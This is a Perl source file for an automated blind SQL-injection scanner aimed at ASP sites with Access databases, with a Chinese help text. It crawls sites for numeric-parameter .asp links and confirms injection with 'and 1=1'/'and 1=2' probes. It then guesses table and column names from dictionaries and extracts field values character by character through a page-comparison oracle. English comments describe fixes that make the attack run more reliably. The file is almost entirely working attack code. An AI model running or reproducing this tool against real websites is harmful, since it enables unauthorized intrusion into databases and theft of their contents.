基于Perl的asp+access扫描注入工具,cookie扫描注入还未完成
-
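#!/usr/bin/perl
# Blind SQL-injection scanner for ASP + Access sites.  Crawls the seed URLs,
# keeps links of the form *.asp?...=<digits>, probes each with "and 1=1" /
# "and 1=2", and then lets the operator dictionary-guess tables, columns,
# lengths and values through a boolean page-comparison oracle.
# Cookie-based injection (Inject_cookie, POD-commented at the bottom) is
# unfinished.
# (The shebang used to read "#!usr/bin/perl" - a relative path - so the
# script could not be run directly.)
use 5.010001;
use strict;
use warnings;
use LWP::UserAgent;
use HTML::LinkExtor;
use URI::URL;
use URI::Escape;
#use HTTP::Cookies;

$|=1;    # unbuffered STDOUT so progress lines appear while probing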
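#############################################
# Shared state: the subs below work on these file-level lexicals instead of
# passing them around.
my $ua = LWP::UserAgent->new(
    # 'User-Agent' / 'time_out' are not LWP::UserAgent->new options, so the
    # previous values were never applied (LWP fell back to its defaults:
    # the libwww-perl agent string and a 180 s timeout).  The real keys are
    # 'agent' and 'timeout'.
    agent   => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; iCafeMedia; .NET CLR 2.0.50727; CIBA)',
    timeout => 3,
);
my %link;          # filled by callback(): href/src values seen on the page being parsed
my @link;          # absolute candidate URLs that passed Link_Anlz()
my $res;           # baseline HTTP::Response of the URL currently under test
my @inject_url;    # confirmed GET injection points (from -i or Inject_get())
#############################################
my $table_fl = "tables.txt";    # table-name dictionary, one name per line (-t)
my $line_fl  = "lines.txt";     # column-name dictionary, one name per line (-l)
my ($high, $low) = (127, 31);   # Half() bisection bounds: value lies in ($low, $high]
#############################################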
# Banner, then: parse the command line (crawling/probing as options are
# seen) and run the interactive extraction on every confirmed injection point.
print "\n\n", <<'BANNER';
===============================================================================
SQL INJECT
by LLC
2013.5.2
===============================================================================

BANNER

Cmd_Anlz(@ARGV);
SQL_Inject(@inject_url);    # stage 2: dictionary-guess tables/columns/values
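# Command-line parsing.  Arguments are consumed left to right; a bare argument
# is a seed URL and is crawled immediately, options take their value from the
# next argument:
#   -u/--url FILE     seed URLs, one per line, crawled as a batch
#   -t/--table FILE   table dictionary (sets $table_fl)
#   -l/--line FILE    column dictionary (sets $line_fl)
#   -i/--inject URL   a known injection point, queued for SQL_Inject()
#   -h/--help         print usage
# Dies on an unknown option ("ERROR COMMAND!") or an unreadable -u file
# ("ERROR").  Written with if/elsif rather than given/when: smartmatch is
# experimental/deprecated on modern perls and options are matched exactly
# now instead of by prefix.
sub Cmd_Anlz{
    my @argv = @_;
    while (defined(my $cmd = shift @argv)) {
        if ($cmd !~ /^-/) {
            Progress($cmd);
        }
        elsif ($cmd eq '-u' or $cmd eq '--url') {
            my $file = shift @argv;
            die "ERROR\n" unless defined $file;
            open my $fh, '<', $file or die "ERROR\n";
            my @input_url;
            while (my $line = <$fh>) {
                chomp $line;
                push @input_url, $line if length $line;    # blank lines used to become "http://"
            }
            close $fh;
            Progress(@input_url) if @input_url;
        }
        elsif ($cmd eq '-t' or $cmd eq '--table') {
            $table_fl = shift @argv;
        }
        elsif ($cmd eq '-l' or $cmd eq '--line') {
            $line_fl = shift @argv;
        }
        elsif ($cmd eq '-i' or $cmd eq '--inject') {
            push @inject_url, Http_add(shift @argv);
        }
        elsif ($cmd eq '-h' or $cmd eq '--help') {
            Help_line();
        }
        else {
            die "ERROR COMMAND!\n";
        }
    }
    return;
}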
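# Crawl every seed URL in @_: fetch the page, collect the href/src targets that
# callback() records in %link, resolve them against *that* page's base, and
# hand the ASP-with-numeric-parameter candidates (Link_Anlz) to Inject_get().
# The seeds themselves are candidates too.
# Fixes: seeds are normalised with Http_add() before being added (a bare
# "host/x.asp?" used to be resolved as a relative path under the last base),
# and each page's links are resolved against its own base rather than the
# base of whichever seed was fetched last.
# Side effects: overwrites @link and $res, clears %link.
sub Progress{
    my @seeds = map { Http_add($_) } @_;
    my %candidate;                       # absolute URL string => 1 (dedup)
    $candidate{$_} = 1 for @seeds;

    for my $seed (@seeds) {
        %link = ();                      # fresh per page; callback() fills it
        my $extractor = HTML::LinkExtor->new(\&callback);
        # Parse the document as it arrives instead of buffering it first.
        $res = $ua->request(HTTP::Request->new(GET => $seed),
                            sub { $extractor->parse($_[0]) });
        $extractor->eof;
        my $base = $res->base;
        $candidate{ url($_, $base)->abs } = 1 for keys %link;
    }
    undef %link;

    @link = Link_Anlz(keys %candidate);
    Inject_get(@link);    # probe each candidate for a boolean GET injection
    return;
}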
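# Make sure $url carries a scheme.  A bare host/path gets "http://" prepended;
# an existing http:// or https:// prefix is kept (scheme lower-cased).  The
# previous regex only knew http and turned "https://x" into "http://https://x".
# An undefined argument yields "http://" (as before, minus the warning).
sub Http_add{
    my $url = shift;
    $url = '' unless defined $url;
    if ($url =~ m{^(https?)://(.*)}is) {
        return lc($1) . "://$2";
    }
    return "http://$url";
}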
# HTML::LinkExtor callback.  For <a> and <link> tags, count every link-bearing
# attribute value (href, src, ...) in the shared %link hash.  Returns the
# values seen for the first time on this page; HTML::LinkExtor ignores the
# return value, the count in %link is what Progress() consumes.
sub callback {
    my ($tag, %attr) = @_;
    return unless $tag eq 'a' || $tag eq 'link';
    my @first_seen = grep { ++$link{$_} < 2 } values %attr;
    return @first_seen;
}
# Filter @_ down to URLs that look like an ASP page whose query string ends
# in a numeric value ("...x.asp?...key=123", optionally followed by whitespace
# or %20).  Processing stops at the first undefined element, as the original
# shift loop did.
sub Link_Anlz{
    my @kept;
    for my $candidate (@_) {
        last unless defined $candidate;
        next unless $candidate =~ m/\.asp\?.*?=\d+((\s+)|((%20)+))?$/;
        push @kept, $candidate;
    }
    return @kept;
}
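# Boolean-based GET probe.  For each URL in @_, fetch the page as-is, with
# " and 1=1" and with " and 1=2" appended (URI-escaped).  The URL is reported
# and queued in @inject_url when the true condition reproduces the baseline
# page byte-for-byte and the false condition does not.
# Fix: the baseline and the 1=1 response must both be 2xx.  Previously an LWP
# transport failure (timeout, refused connection) produced identical internal
# error bodies for both, which counted as a match and could mark the URL as
# injectable when the 1=2 request then happened to succeed.
# Stops at the first undefined element, like the original shift loop.
sub Inject_get{
    for my $target (@_) {
        last unless defined $target;
        my $baseline   = $ua->get($target);
        my $true_cond  = $ua->get($target . uri_escape(" and 1=1"));
        my $false_cond = $ua->get($target . uri_escape(" and 1=2"));

        my $injectable =
               $baseline->is_success && $true_cond->is_success
            && $baseline->content eq $true_cond->content
            && $true_cond->content ne $false_cond->content;

        if ($injectable) {
            print "GET注入点: \t$target\n";
            push @inject_url, $target;
        }
        else {
            print "找不到注入点\n";
        }
    }
    return;
}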
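# Interactive blind extraction against the injection points passed in @_.
# Oracle: a condition is "true" when the injected request gets a 2xx response
# whose body is byte-identical to the unmodified page (kept in $res).
# Stages, each printing what it finds:
#   1. table names    "and exists (select * from T)" for every T in $table_fl,
#                     over each URL until one exposes a table ($success_url)
#   2. column names   operator types a comma list of tables on STDIN, then
#                     "and exists (select C from T)" for every C in $line_fl
#   3. column length  operator types "T:C1,C2" on STDIN; linear probe of
#                     "(select top 1 len(C) from T) > n"
#   4. first value    per position, bisect asc(mid(C,n,1)) over (31,127]
#                     with Half() and the shared $high/$low bounds
# Returns 0 when there is nothing to do or a stage finds nothing.
# Only the first row is recovered ("top 1") and only printable ASCII:
# Access asc() of multi-byte text falls outside the bisection range.
# Fixes versus the previous version: each dictionary is read once (a shared
# filehandle was re-read per URL / per table and was already at EOF the second
# time, so only the first URL and first table were ever probed); the
# bisection lower bound is 31 rather than 32 so a space (32) can be recovered
# (the file-level default already said 31); the oracle checks is_success
# instead of status_line =~ /20/; the length probe has an upper bound.
sub SQL_Inject{
    return 0 unless @_;
    my @url = @_;
    my @table;
    my @line;
    my @length;
    my $success_url;

    my @table_dict = _read_dict($table_fl);

    ################### table names #####################
    print "\n猜表名 ing... \twait\n";
    URL: for my $target (@url) {
        last URL unless defined $target;
        $res = $ua->get($target);    # baseline page for this URL
        for my $name (@table_dict) {
            next unless _page_matches($target . uri_escape(" and exists (select * from $name)"));
            push @table, $name;
            print "TABLE NAME:\t$name\n";
            $success_url = $target;
        }
        last URL if @table;    # keep the first URL that exposes tables
    }

    unless (@table) {
        print "猜表失败,请尝试其他表字典\n";
        return 0;
    }

    ################### column names #####################
    print "\n猜列名==>\t请输入表名:(表名间以\",\"分割)\nTABLE NAME:\t";
    my $in_table = <STDIN>;
    $in_table = '' unless defined $in_table;    # EOF: falls through to "failed"
    chomp $in_table;
    @table = split /,/, $in_table;
    my @line_dict = _read_dict($line_fl);
    $res = $ua->get($success_url);    # re-baseline the URL used from here on
    print "\n表名==> \t列名\n";

    for my $table (@table) {
        for my $name (@line_dict) {
            next unless _page_matches($success_url . uri_escape(" and exists (select $name from $table)"));
            push @line, $name;
            print "$table==>\t$name\n";
        }
    }

    unless (@line) {
        print "猜列失败,请尝试其他表字典\n";
        return 0;
    }

    ##################### column length #####################
    print "\n猜列长==>\t请输入表名:列名:(多个列名间以\",\"分割)\n";
    my $lines = <STDIN>;
    $lines = '' unless defined $lines;
    chomp $lines;
    my $table;
    ($table, $lines) = split /:/, $lines, 2;    # limit 2: a ':' inside the column list is kept
    $lines //= '';
    @line = split /,/, $lines;

    # Bound on the linear probe so a page that never changes cannot spin
    # forever.  65535 is the Access Memo size limit - presumably ample; confirm.
    my $max_len = 65535;
    for my $col (@line) {
        my $len = 0;
        # The page stays "true" while len(col) > $len; the first $len that
        # fails is the length.
        while (1) {
            $len++;
            last unless _page_matches($success_url
                . uri_escape(" and (select top 1 len($col) from $table)>$len"));
            if ($len >= $max_len) {
                print "length probe for $table.$col reached $max_len, skipping this column\n";
                $len = 0;    # stage 4 then has nothing to do for it
                last;
            }
        }
        print "$table==>$col:\t$len\n";
        push @length, $len;
    }

    ######################## field values ###################
    print "\n猜解字段的值\n";
    for my $i (0 .. $#line) {
        my $col = $line[$i];
        my @asc_value;
        print "\n$table=>$col:";
        for my $pos (1 .. $length[$i]) {
            # Half() narrows ($low, $high] until they are adjacent; $high is
            # then the character code.
            ($high, $low) = (127, 31);
            my $mid = int(($high + $low) / 2);
            while ($high != $low + 1) {
                my $greater = _page_matches($success_url
                    . uri_escape(" and (select top 1 asc(mid($col,$pos,1)) from $table)>$mid"));
                $mid = Half($greater ? 1 : 0, $mid);
            }
            push @asc_value, $high;
            print "$high--";
        }
        print "\nRESULT:\t" . join("", map { chr } @asc_value);
    }

    print qq~\n
++++++++++++++++++++++++++++++++++++++ END ++++++++++++++++++++++++++++++++++++
~;
    return;
}

# Read a dictionary file (one entry per line), dropping line endings and blank
# lines.  Dies with the tool's usual message when the file cannot be opened.
sub _read_dict {
    my ($path) = @_;
    open my $fh, '<', $path or die "can't open $path\n";
    my @entries;
    while (my $entry = <$fh>) {
        chomp $entry;
        push @entries, $entry if length $entry;
    }
    close $fh;
    return @entries;
}

# Truth oracle: fetch $probe_url and report whether it is a 2xx response whose
# body is byte-identical to the baseline page held in $res.
sub _page_matches {
    my ($probe_url) = @_;
    my $resp = $ua->get($probe_url);
    return $resp->is_success && $resp->content eq $res->content;
}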
# One bisection step over the shared ($low, $high] interval.  $result == 1
# means the probed value was greater than $value, so $value becomes the new
# lower bound; anything else makes it the new upper bound.  Returns the next
# midpoint to probe (integer division).
sub Half{
    my ($result, $value) = @_;
    my $raise_low = ($result == 1);
    if ($raise_low) {
        $low = $value;
    }
    else {
        $high = $value;
    }
    return int(($high + $low) / 2);
}
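# Print the usage text.  Fix: the column dictionary option is -l/--line, as in
# Cmd_Anlz(); the text used to list it as -i, which is --inject.
sub Help_line{
    print q~
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
帮助信息

(1) -t 或 --table 加文件名 ==> 数据库的表字典,默认为tables.txt
(2) -l 或 --line 加文件名 ==> 数据库的列字典,默认为lines.txt
(3) -u 或 --url 加文件名 ==> 读取url字典,请求字典中的url
对返回页面中的链接扫描注入点,发现后自动注入。
如果不加 "-参数",则只对输入的url进行上述操作。

(4) -i 或 --inject 加注入点url==>直接对该注入点进行注入
(5) -h 或 --help 查看此条帮助信息

EXP: ***.pl www.xxx.com/news.asp?
***.pl -i www.xxx.com:8080/news.asp?id=13 --table form.txt

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
NAME:SQL Inject Version:1.0 By:LLC E_mail:183229003@qq.com
________________________________________________________________________________
~;
    return;
}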
=cookie
-
sub Inject_cookie{
-
my %cookie=();
-
my $tmp=shift;
-
my $cookie_jar=HTTP::Cookies->new(file=>'tmp.dat',autosave=>1,);
-
#while(defined(my $tmp=shift @_)){
-
$ua->cookie_jar($cookie_jar);
-
$res=$ua->get($tmp);
-
$tmp=~m!(.*asp\?)((.*?)=(\d+))$!;
-
my $url_base=$1;
-
my $url_id=$3;
-
my $url_num=$4;
-
$cookie{0}=HTTP::Cookies->new(file=>'tmp.txt',autosave=>1,$3=>$4);
-
print "\n $1\t$3\t$4\n";
-
$cookie{1}=uri_escape("$url_id and 1=1");
-
$cookie{2}=uri_escape("$url_id and 1=2");
-
#$ua->cookie_jar($cookie{0});
-
#$cookie{0}=$ua->get($url_base);
-
#print $cookie{0}->content;
-
#print "cookie\n" if ($res->content eq $cookie{0}->content)
-
}
-
=cut